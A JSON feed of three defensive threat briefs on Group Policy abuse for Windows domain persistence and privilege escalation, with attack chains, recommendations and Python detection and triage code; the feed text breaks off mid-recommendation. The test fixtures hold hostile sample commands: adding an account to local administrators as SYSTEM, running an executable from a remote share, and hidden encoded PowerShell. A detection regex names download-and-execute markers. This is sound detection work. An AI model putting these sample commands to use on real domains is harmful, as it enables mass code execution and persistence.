{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/group-policy/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["group-policy","privilege-escalation","persistence","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers who hold domain administrator privileges, or who have otherwise been granted edit rights on a Group Policy Object (GPO), can abuse GPOs to deploy malicious payloads across a Windows domain. By creating or modifying Group Policy Preferences scheduled tasks or services, an attacker gains code execution on every computer the GPO applies to; the task or service can be configured to run as SYSTEM, which yields both privilege escalation on those hosts and persistence that survives reboots. The change is made to files such as \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e or \u003ccode\u003eServices.xml\u003c/code\u003e under the GPO\u0026rsquo;s folder in the SYSVOL share. SYSVOL replicates the change to every domain controller, and domain-joined machines download and apply the new settings at their next Group Policy refresh. Because one write on a central share turns into code execution on a large number of systems, this is a favoured technique for adversaries who have already compromised an enterprise domain. The described rule detects file modifications within these GPO paths, excluding writes made by the \u003ccode\u003edfsrs.exe\u003c/code\u003e process: that is the DFS Replication service, which copies the changed file to the other domain controllers, so the exclusion leaves one alert on the controller that received the write instead of one alert per controller. Two caveats follow from that: SYSVOL lives on domain controllers, so the rule produces nothing unless file telemetry is collected there, and a write made over the SYSVOL SMB share is recorded on the controller as the \u003ccode\u003eSystem\u003c/code\u003e process rather than the attacker\u0026rsquo;s tool, so the process field identifies the author only for edits made locally on the controller. 
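The file-event rule described above, as an added example run over constructed telemetry (this is not the CraftedSignal Sigma rule nor any vendor's code): it applies the path match and the dfsrs.exe exclusion to a handful of file-modification records, then parses the ScheduledTasks.xml that was written to show what each task would run and as which account. The record field names (host, user, image, path), the sample records and the sample XML are assumptions constructed for this example; map the fields to your own source (Sysmon Event ID 11 uses Image and TargetFilename).

```python
import re
import xml.etree.ElementTree as ET

# GPO preference files in scope: ScheduledTasks.xml and Services.xml under any
# Policies\{GUID}\MACHINE\Preferences tree, whether seen as the local SYSVOL
# path on the controller or as a UNC path.
GPO_PREF_FILE = re.compile(
    r"\\Policies\\\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"
    r"\\MACHINE\\Preferences\\"
    r"(?:ScheduledTasks\\ScheduledTasks\.xml|Services\\Services\.xml)$",
    re.IGNORECASE,
)

# dfsrs.exe is the DFS Replication service that copies a changed SYSVOL file to
# the other domain controllers; excluding it leaves one alert on the controller
# that received the write instead of one alert per controller.
EXCLUDED_IMAGES = {"dfsrs.exe"}


def is_gpo_pref_modification(event: dict) -> bool:
    """Rule logic: in-scope GPO preference file written by anything other than
    the replication service. 'image' is the writing process (Sysmon: Image)."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if image_name in EXCLUDED_IMAGES:
        return False
    return GPO_PREF_FILE.search(event["path"]) is not None


def alerts(events: list[dict]) -> list[dict]:
    """Return the records that fire the rule, in input order."""
    return [e for e in events if is_gpo_pref_modification(e)]


def triage_scheduled_tasks_xml(xml_text: str) -> list[dict]:
    """Summarise what each task item in a GPP ScheduledTasks.xml would execute.
    Every item (TaskV2, ImmediateTaskV2, ...) carries a <Properties> element
    with the runAs account and, for V2 items, a Task/Actions/Exec block."""
    findings = []
    for item in ET.fromstring(xml_text):
        props = item.find("Properties")
        if props is None:
            continue
        for exec_node in props.iter("Exec"):
            findings.append({
                "item": item.tag,
                "task": item.get("name"),
                "run_as": props.get("runAs"),
                "command": (exec_node.findtext("Command") or "").strip(),
                "arguments": (exec_node.findtext("Arguments") or "").strip(),
            })
    return findings


# Constructed sample records (not real telemetry). DEFAULT_DOMAIN_POLICY is the
# well-known GUID of the Default Domain Policy GPO.
DEFAULT_DOMAIN_POLICY = "{31B2F340-016D-11D2-945F-00C04FB984F9}"
SYSVOL_GPO = "\\".join(["C:\\Windows\\SYSVOL\\sysvol\\corp.local\\Policies", DEFAULT_DOMAIN_POLICY])
SAMPLE_EVENTS = [
    # 1. An administrator account edits the task file with notepad on DC01: fires.
    {"host": "DC01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\notepad.exe",
     "path": SYSVOL_GPO + "\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"},
    # 2. DFS Replication lands the same file on DC02: suppressed.
    {"host": "DC02", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\dfsrs.exe",
     "path": SYSVOL_GPO + "\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"},
    # 3. Services.xml written over the SYSVOL share: the controller attributes an SMB
    #    write to the System process, so the rule fires but 'image' does not name the
    #    attacker's tool (Security Event ID 5145 supplies the account and source address).
    {"host": "DC01", "user": "NT AUTHORITY\\SYSTEM", "image": "System",
     "path": SYSVOL_GPO + "\\MACHINE\\Preferences\\Services\\Services.xml"},
    # 4. A different preference file in the same GPO: out of scope for this rule.
    {"host": "DC01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\notepad.exe",
     "path": SYSVOL_GPO + "\\MACHINE\\Preferences\\Registry\\Registry.xml"},
]

# Constructed ScheduledTasks.xml following the Group Policy Preferences layout;
# the payload line is illustrative only.
SAMPLE_SCHEDULED_TASKS_XML = """<ScheduledTasks>
  <ImmediateTaskV2 name="Update Check">
    <Properties action="C" name="Update Check" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators CORP\\svc-backup /add</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

if __name__ == "__main__":
    for hit in alerts(SAMPLE_EVENTS):
        print(f"ALERT {hit['host']}: {hit['image']} wrote {hit['path']}")
    for f in triage_scheduled_tasks_xml(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"  {f['item']} '{f['task']}' runs as {f['run_as']}: {f['command']} {f['arguments']}")
```

Records 1 and 3 fire, record 2 is the replication copy the exclusion is meant to drop, and record 4 shows the rule's scope is deliberately narrow: Group Policy Preferences has many other XML files (Registry.xml, Files.xml, Groups.xml) that a separate rule would have to cover. The triage step is what an analyst does next with the alerted file: the runAs account and the Exec block tell you immediately whether the change is a benign housekeeping task or a payload.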
The rule is designed to detect suspicious activities related to scheduled tasks and services within Group Policy settings, helping security teams identify and respond to potential threats originating from compromised domain administrator accounts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains domain administrator privileges (or edit rights on a GPO) through compromised credentials or by exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the SYSVOL share, typically located at \u003ccode\u003e\\\\\u0026lt;domain\u0026gt;\\SYSVOL\\\u0026lt;domain\u0026gt;\\Policies\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a GPO to modify, preferably one already linked to many computers, or creates a new GPO.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e or \u003ccode\u003eServices.xml\u003c/code\u003e file within the GPO\u0026rsquo;s directory (\u003ccode\u003e\u0026lt;GPO_GUID\u0026gt;\\MACHINE\\Preferences\\ScheduledTasks\\\u003c/code\u003e or \u003ccode\u003e\u0026lt;GPO_GUID\u0026gt;\\MACHINE\\Preferences\\Services\\\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe modified XML file contains instructions to create a scheduled task or service that executes a malicious payload. For clients to process it, the GPO\u0026rsquo;s \u003ccode\u003egPCMachineExtensionNames\u003c/code\u003e attribute in Active Directory must list the relevant Group Policy Preferences client-side extension, and the GPO version number (in \u003ccode\u003eGPT.ini\u003c/code\u003e and the \u003ccode\u003eversionNumber\u003c/code\u003e attribute) must be incremented; GPMC does both automatically, and attacker tooling does the same.\u003c/li\u003e\n\u003cli\u003eIf the GPO is new, the Group Policy Management Console (GPMC) or other tools are used to link it to an organizational unit (OU) containing target computers.\u003c/li\u003e\n\u003cli\u003eTarget machines within the OU receive the updated GPO settings during the next Group Policy refresh cycle (or sooner, if the attacker can run \u003ccode\u003egpupdate /force\u003c/code\u003e on a host they already control).\u003c/li\u003e\n\u003cli\u003eThe scheduled task or service is created on the target machine, executing the attacker\u0026rsquo;s malicious payload and achieving persistence or privilege escalation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to 
widespread compromise across the domain. Attackers can execute arbitrary code on numerous systems, potentially leading to data exfiltration, ransomware deployment, or disruption of critical services. The impact can range from minor inconveniences to complete operational shutdown, depending on the nature of the malicious payload and the attacker\u0026rsquo;s objectives. Without proper detection and response mechanisms, such attacks can persist for extended periods, causing significant damage to the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect GPO Scheduled Task/Service Modification via File Event\u003c/code\u003e to detect unauthorized modifications to \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e and \u003ccode\u003eServices.xml\u003c/code\u003e files within GPO paths.\u003c/li\u003e\n\u003cli\u003eCollect file-event telemetry from the domain controllers, where SYSVOL is hosted: Sysmon Event ID 11 (FileCreate, which is also raised when an existing file is overwritten) or the file events of an EDR such as those listed above. Without it the rule has no data to match.\u003c/li\u003e\n\u003cli\u003eReview and harden GPO management access controls (MITRE ATT\u0026CK T1484.001, Group Policy Modification): limit GPO edit rights to a small set of tier-0 administrative accounts and review any principal with write access to a GPO\u0026rsquo;s container or SYSVOL folder.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the deployed rules, focusing on the user account and process involved in the file modification. A write made over the SYSVOL share is recorded on the controller as the \u003ccode\u003eSystem\u003c/code\u003e process, so pair the file event with Security Event ID 5145 (Detailed File Share) to recover the account and source address of the writer.\u003c/li\u003e\n\u003cli\u003eOn the target machines, monitor for services and scheduled tasks created by Group Policy whose binaries sit in unusual locations: System log Event ID 7045 (a service was installed) and Security Event ID 4698 (a scheduled task was created).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gpo-scheduled-task-modification/","summary":"Detection of the creation or modification of Group Policy based scheduled tasks or services, which can be abused by attackers with domain admin permissions to execute malicious payloads remotely on domain-joined 
machines, leading to privilege escalation and persistence.","title":"GPO Scheduled Task or Service Creation/Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-gpo-scheduled-task-modification/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["group-policy","scheduled-task","privilege-escalation","lateral-movement"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAttackers can abuse Group Policy Objects (GPOs) to execute scheduled tasks at scale, compromising every computer or user the GPO applies to. This involves modifying the contents of the \u003ccode\u003e\u0026lt;GPOPath\u0026gt;\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml\u003c/code\u003e file (or its \u003ccode\u003eUser\u003c/code\u003e counterpart). By altering the XML file to include malicious commands, attackers can achieve privilege escalation or lateral movement within the domain. This technique leverages a legitimate Active Directory mechanism, so an administrator editing in GPMC and an attacker with stolen credentials leave the same trail; the difficulty is differentiating authorized administrative actions from malicious ones. 
The modification can be identified through changes to the \u003ccode\u003egPCMachineExtensionNames\u003c/code\u003e or \u003ccode\u003egPCUserExtensionNames\u003c/code\u003e attribute of the GPO\u0026rsquo;s \u003ccode\u003egroupPolicyContainer\u003c/code\u003e object in Active Directory: adding a scheduled task preference to a GPO that had none appends the Scheduled Tasks client-side extension GUIDs to that attribute, and with \u0026ldquo;Audit Directory Service Changes\u0026rdquo; enabled the write is logged as Security Event ID 5136.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system with an account that has permission to modify GPOs.\u003c/li\u003e\n\u003cli\u003eAttacker modifies the \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e file within the SYSVOL share of a targeted GPO (\u003ccode\u003e\\\\*\\SYSVOL\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker changes the contents of the XML file to include a malicious \u003ccode\u003e\u0026lt;Command\u0026gt;\u003c/code\u003e and \u003ccode\u003e\u0026lt;Arguments\u0026gt;\u003c/code\u003e pair, often inside an \u003ccode\u003e\u0026lt;ImmediateTaskV2\u0026gt;\u003c/code\u003e item so that the task runs at the next refresh rather than on a schedule.\u003c/li\u003e\n\u003cli\u003eThe modified GPO is replicated to the other domain controllers.\u003c/li\u003e\n\u003cli\u003eTarget systems receive the updated GPO during regular group policy refresh cycles.\u003c/li\u003e\n\u003cli\u003eThe scheduled task defined in the modified \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e is executed on the target systems.\u003c/li\u003e\n\u003cli\u003eThe malicious command executes, potentially escalating privileges or facilitating lateral movement.\u003c/li\u003e\n\u003cli\u003eAttacker achieves the desired objective, such as installing malware, creating new accounts, or exfiltrating data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on systems managed by the modified GPO. The scope of impact depends on the targeted GPO and the account the scheduled task runs as. This can lead to widespread compromise, affecting numerous systems and users within the domain. 
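The two audit signals this brief's detections rest on, correlated, as an added example (not the CraftedSignal Sigma rules or any vendor's code): the Event ID 5136 change to gPCMachineExtensionNames or gPCUserExtensionNames, and the Event ID 5145 WriteData access to ScheduledTasks.xml on the SYSVOL share, tied together by account and GPO GUID. The records are constructed and use the Security log field names; the two GUIDs matched in the attribute value are the ones the Scheduled Tasks preference client-side extension and the Group Policy Preferences tool register in that attribute, and they should be confirmed against a GPO in your own environment before deployment.

```python
import re
from datetime import datetime, timedelta
from typing import Optional

# GUIDs the Scheduled Tasks preference registers in gPC*ExtensionNames: the
# client-side extension and the Group Policy Preferences tool. Verify against a
# GPO in your own directory (read the attribute on the GPO's container object).
SCHEDULED_TASKS_CSE = "{AADCED64-746C-4633-A97C-D61349046527}"
GPP_TOOL = "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}"

GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", re.IGNORECASE)
WRITE_DATA = "%%4417"      # 5145 AccessList token for WriteData / AddFile
VALUE_ADDED = "%%14674"    # 5136 OperationType: value added


def gpo_extension_change(ev: dict) -> bool:
    """5136: scheduled-task CSE GUIDs added to a GPO's extension-names attribute."""
    if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
        return False
    if ev.get("AttributeLDAPDisplayName") not in ("gPCMachineExtensionNames", "gPCUserExtensionNames"):
        return False
    value = ev.get("AttributeValue", "").upper()
    return SCHEDULED_TASKS_CSE in value and GPP_TOOL in value


def sysvol_task_write(ev: dict) -> bool:
    """5145: WriteData on a ScheduledTasks.xml beneath the SYSVOL share."""
    if ev.get("EventID") != 5145:
        return False
    share = ev.get("ShareName", "").upper()
    target = ev.get("RelativeTargetName", "").upper()
    return (share.endswith("\\SYSVOL") and target.endswith("\\SCHEDULEDTASKS.XML")
            and WRITE_DATA in ev.get("AccessList", ""))


def gpo_guid(text: str) -> Optional[str]:
    """Pull the GPO GUID out of an ObjectDN or a SYSVOL relative path."""
    m = GUID_RE.search(text)
    return m.group(0).upper() if m else None


def correlate(events: list[dict], window_seconds: int = 600) -> list[dict]:
    """Pair each attribute change with a SYSVOL write by the same account on the
    same GPO within the window. A legitimate GPMC edit produces exactly this pair,
    so the output is a lead to check against change records, not a verdict."""
    window = timedelta(seconds=window_seconds)
    changes = [e for e in events if gpo_extension_change(e)]
    writes = [e for e in events if sysvol_task_write(e)]
    incidents = []
    for c in changes:
        c_time = datetime.fromisoformat(c["TimeCreated"])
        for w in writes:
            same_account = c["SubjectUserName"].lower() == w["SubjectUserName"].lower()
            same_gpo = gpo_guid(c["ObjectDN"]) == gpo_guid(w["RelativeTargetName"])
            in_window = abs(datetime.fromisoformat(w["TimeCreated"]) - c_time) <= window
            if same_account and same_gpo and in_window:
                incidents.append({"account": c["SubjectUserName"], "gpo": gpo_guid(c["ObjectDN"]),
                                  "attribute": c["AttributeLDAPDisplayName"],
                                  "source_ip": w.get("IpAddress"), "controller": c["Computer"]})
    return incidents


# Constructed records shaped like Security log events (not real telemetry).
# GPO is the well-known Default Domain Policy GUID.
GPO = "{31B2F340-016D-11D2-945F-00C04FB984F9}"
EXT_NAMES = f"[{{00000000-0000-0000-0000-000000000000}}{GPP_TOOL}][{SCHEDULED_TASKS_CSE}{GPP_TOOL}]"
SAMPLE_EVENTS = [
    # The SYSVOL write lands first, then the attribute change that makes clients process it.
    {"EventID": 5145, "TimeCreated": "2024-01-03T10:00:02+00:00", "Computer": "DC01",
     "SubjectUserName": "jdoe", "IpAddress": "10.0.20.15", "ShareName": "\\\\*\\SYSVOL",
     "RelativeTargetName": "corp.local\\Policies\\" + GPO + "\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml",
     "AccessList": "%%4417 %%4418"},
    {"EventID": 5136, "TimeCreated": "2024-01-03T10:00:05+00:00", "Computer": "DC01",
     "SubjectUserName": "jdoe", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN=" + GPO + ",CN=Policies,CN=System,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames", "AttributeValue": EXT_NAMES,
     "OperationType": "%%14674"},
    # Routine policy refresh: a workstation reading GPT.ini (ReadData only). This is
    # the bulk of 5145 volume on a controller and must not match.
    {"EventID": 5145, "TimeCreated": "2024-01-03T10:00:30+00:00", "Computer": "DC01",
     "SubjectUserName": "WS042$", "IpAddress": "10.0.30.42", "ShareName": "\\\\*\\SYSVOL",
     "RelativeTargetName": "corp.local\\Policies\\" + GPO + "\\GPT.ini", "AccessList": "%%4416"},
    # Unrelated GPO edit: a displayName change on the Default Domain Controllers Policy.
    {"EventID": 5136, "TimeCreated": "2024-01-03T10:02:00+00:00", "Computer": "DC01",
     "SubjectUserName": "asmith", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={6AC1786C-016F-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "displayName", "AttributeValue": "Workstation Baseline",
     "OperationType": "%%14674"},
]

if __name__ == "__main__":
    for inc in correlate(SAMPLE_EVENTS):
        print(f"{inc['account']} from {inc['source_ip']} added a scheduled task to GPO {inc['gpo']} "
              f"(attribute {inc['attribute']}, seen on {inc['controller']})")
```

Each half is the logic of one of the two rules named in the recommendations; the correlation is the analyst's next step, and it is what turns two medium-confidence signals into one lead with an account, a source address and a GPO to look at. The source address comes only from the 5145 record, because the directory write in 5136 carries no client address.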
The modification of GPOs can be difficult to detect without proper monitoring, potentially allowing attackers to maintain persistence and control over the environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable the Windows audit subcategories \u0026ldquo;Audit Directory Service Changes\u0026rdquo; (DS Access; produces Event ID 5136 for attribute changes on objects whose SACL audits the write) and \u0026ldquo;Audit Detailed File Share\u0026rdquo; (Object Access; produces Event ID 5145 for every file accessed over a share) on the domain controllers. 5145 is high-volume, so filter it at collection time to the SYSVOL share.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Scheduled Task Execution via GPO Attribute Modification\u0026rdquo; to detect modifications to the \u003ccode\u003egPCMachineExtensionNames\u003c/code\u003e or \u003ccode\u003egPCUserExtensionNames\u003c/code\u003e attributes.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Scheduled Task XML File Modification in SYSVOL\u0026rdquo; to detect write access to the \u003ccode\u003eScheduledTasks.xml\u003c/code\u003e file in SYSVOL shares.\u003c/li\u003e\n\u003cli\u003eReview and validate any changes to GPOs, specifically those related to scheduled tasks, against change records to confirm they are authorized; the events themselves look identical for a legitimate GPMC edit and for an attacker using stolen credentials.\u003c/li\u003e\n\u003cli\u003eMonitor for the execution of unexpected or malicious commands originating from scheduled tasks created or modified via GPOs.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review GPO configurations, including who holds edit rights on each GPO, to identify weaknesses or misconfigurations that could be exploited.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gpo-scheduled-task-abuse/","summary":"Attackers abuse Group Policy Objects by modifying scheduled task attributes to execute malicious commands 
across objects controlled by the GPO, potentially leading to privilege escalation and lateral movement.","title":"GPO Scheduled Task Abuse for Privilege Escalation and Lateral Movement","url":"https://feed.craftedsignal.io/briefs/2024-01-gpo-scheduled-task-abuse/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["group-policy","privilege-escalation","persistence","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAttackers may abuse Group Policy Objects (GPOs) to execute malicious commands at startup, logon, shutdown, and logoff by modifying the \u003ccode\u003escripts.ini\u003c/code\u003e (batch files and executables) or \u003ccode\u003epsscripts.ini\u003c/code\u003e (PowerShell scripts) files. This involves adding or modifying these files within the \u003ccode\u003e\u0026lt;GPOPath\u0026gt;\\Machine\\Scripts\\\u003c/code\u003e or \u003ccode\u003e\u0026lt;GPOPath\u0026gt;\\User\\Scripts\\\u003c/code\u003e directories, with the script bodies usually placed in the \u003ccode\u003eStartup\u003c/code\u003e, \u003ccode\u003eShutdown\u003c/code\u003e, \u003ccode\u003eLogon\u003c/code\u003e or \u003ccode\u003eLogoff\u003c/code\u003e subfolders beneath them. Startup and shutdown scripts run as SYSTEM on the computer, so a machine-side entry gives the attacker elevated code execution on every computer the GPO applies to; logon and logoff scripts run in the context of the logging-on user, which gives execution as many users rather than elevation. Either way the attacker gains persistent access to the targeted systems within the Active Directory environment. This activity is a post-exploitation step, used after initial access has been gained through other means such as phishing or exploiting vulnerabilities. 
The goal is to achieve widespread command execution across multiple systems within the domain.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system with sufficient privileges to modify GPOs, often through compromised credentials or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target GPO to modify, typically one that applies to a large number of users or computers.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies either the \u003ccode\u003escripts.ini\u003c/code\u003e or \u003ccode\u003epsscripts.ini\u003c/code\u003e file within the \u003ccode\u003eMachine\\Scripts\u003c/code\u003e or \u003ccode\u003eUser\\Scripts\u003c/code\u003e directory of the targeted GPO.\u003c/li\u003e\n\u003cli\u003eThe modification adds a numbered entry (\u003ccode\u003e0CmdLine=\u003c/code\u003e and \u003ccode\u003e0Parameters=\u003c/code\u003e, then \u003ccode\u003e1CmdLine=\u003c/code\u003e and so on, under the \u003ccode\u003e[Startup]\u003c/code\u003e, \u003ccode\u003e[Shutdown]\u003c/code\u003e, \u003ccode\u003e[Logon]\u003c/code\u003e or \u003ccode\u003e[Logoff]\u003c/code\u003e section) or repoints an existing one at a malicious script or command. The script can be a batch file, PowerShell script, or executable, and the entry can reference a file dropped next to the INI or any path the target can reach. Appending a new index leaves the legitimate entries intact, so the change is easy to miss on a casual review.\u003c/li\u003e\n\u003cli\u003eThe attacker links the GPO to an Organizational Unit (OU) containing the target computers or users, or relies on the existing GPO link.\u003c/li\u003e\n\u003cli\u003eWhen targeted users log on or computers start up, the GPO settings are applied, and the malicious script is executed.\u003c/li\u003e\n\u003cli\u003eThe malicious script performs actions such as installing malware, adding user accounts with elevated privileges, or modifying system configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence and/or elevated privileges across the targeted systems, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary commands with elevated privileges across numerous systems within the targeted domain. 
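The scripts.ini layout the attack chain above describes, parsed for triage, as an added example (not the CraftedSignal rule or any vendor's code): it decodes the file (GPMC writes these INI files as UTF-16 with a byte-order mark, while a hand-written one may be plain ASCII), lists every numbered entry per phase, resolves bare script names to the GPO's own Scripts folder, and flags entries that point outside SYSVOL or NETLOGON or that pass encoded or hidden-window interpreter arguments. The GPO path, the sample INI and the flagging heuristics are assumptions constructed for the example; psscripts.ini uses the same numbered layout and parses the same way.

```python
import configparser
import re

# Phase sections and the side of the GPO their script folders live under.
PHASES = {"Startup": "Machine", "Shutdown": "Machine", "Logon": "User", "Logoff": "User"}
CMDLINE_KEY = re.compile(r"^(\d+)CmdLine$", re.IGNORECASE)
TRUSTED_SHARE = re.compile(r"^\\\\[^\\]+\\(SYSVOL|NETLOGON)\\", re.IGNORECASE)
# Heuristic markers for a hidden or encoded interpreter invocation; tune to taste.
SUSPICIOUS_ARGS = re.compile(r"(?i)(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|iex\b)")


def decode_ini(raw: bytes) -> str:
    """GPMC writes scripts.ini/psscripts.ini as UTF-16 with a BOM; an attacker's
    hand-written file may be plain ASCII. Handle both."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_scripts_ini(raw: bytes, gpo_path: str) -> list[dict]:
    """Return one record per numbered script entry, with the resolved path and
    any heuristic flags. gpo_path is the GPO's folder under SYSVOL\\Policies."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written ('0CmdLine', '0Parameters')
    cp.read_string(decode_ini(raw))
    entries = []
    for phase, side in PHASES.items():
        if not cp.has_section(phase):
            continue
        section = cp[phase]
        for key in section:
            m = CMDLINE_KEY.match(key)
            if not m:
                continue
            idx = m.group(1)
            cmdline = section[key].strip()
            params = section.get(f"{idx}Parameters", "").strip()
            # A bare file name is resolved by the client against the GPO's own
            # Scripts\<Phase> folder; a path is taken literally.
            if "\\" not in cmdline and not re.match(r"^[A-Za-z]:", cmdline):
                resolved = f"{gpo_path}\\{side}\\Scripts\\{phase}\\{cmdline}"
            else:
                resolved = cmdline
            flags = []
            if not TRUSTED_SHARE.match(resolved):
                flags.append("script outside SYSVOL/NETLOGON")
            if SUSPICIOUS_ARGS.search(params):
                flags.append("encoded or hidden interpreter arguments")
            entries.append({"phase": phase, "index": int(idx), "cmdline": cmdline,
                            "parameters": params, "resolved": resolved, "flags": flags})
    entries.sort(key=lambda e: (list(PHASES).index(e["phase"]), e["index"]))
    return entries


# Constructed sample: the Default Domain Controllers Policy GUID as the GPO path,
# one legitimate entry and two appended by an attacker. Payload is a placeholder
# (the base64 decodes to 'ABC').
GPO_PATH = "\\\\corp.local\\SYSVOL\\corp.local\\Policies\\{6AC1786C-016F-11D2-945F-00C04FB984F9}"
SAMPLE_SCRIPTS_INI = (
    "\r\n[Startup]\r\n"
    "0CmdLine=inventory.bat\r\n"
    "0Parameters=\r\n"
    "1CmdLine=\\\\10.0.20.15\\share\\update.exe\r\n"
    "1Parameters=/quiet\r\n"
    "2CmdLine=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n"
    "2Parameters=-nop -w hidden -enc QQBCAEMA\r\n"
    "[Shutdown]\r\n"
).encode("utf-16")  # UTF-16 with BOM, as GPMC writes it

if __name__ == "__main__":
    for e in parse_scripts_ini(SAMPLE_SCRIPTS_INI, GPO_PATH):
        status = "; ".join(e["flags"]) or "ok"
        print(f"[{e['phase']}] {e['index']}: {e['resolved']} {e['parameters']}  -> {status}")
```

Run this against a copy of every scripts.ini and psscripts.ini under SYSVOL\Policies and diff the output over time; because attackers tend to append an entry rather than overwrite the existing one, a new index number appearing in a long-standing GPO is itself a strong signal, even before the heuristics fire.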
This can result in widespread malware infection, data theft, or complete system compromise. The impact can range from operational disruption to significant financial loss and reputational damage, affecting potentially hundreds or thousands of machines. Since this attack leverages legitimate Active Directory functionality, detection is difficult without proper monitoring and alerting in place.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable the \u0026ldquo;Audit Directory Service Changes\u0026rdquo; and \u0026ldquo;Audit Detailed File Share\u0026rdquo; Windows audit policies on the domain controllers to generate the events required for detection, as described in the \u003ca href=\"https://ela.st/audit-directory-service-changes\"\u003esetup instructions\u003c/a\u003e and \u003ca href=\"https://ela.st/audit-detailed-file-share\"\u003eaudit detailed file share instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect GPO Modification for Startup/Logon Scripts\u0026rdquo; to your SIEM to detect modifications to GPOs that add or modify startup/logon scripts.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs for Event ID 5136 on \u003ccode\u003egroupPolicyContainer\u003c/code\u003e objects where the changed attribute is \u003ccode\u003egPCMachineExtensionNames\u003c/code\u003e or 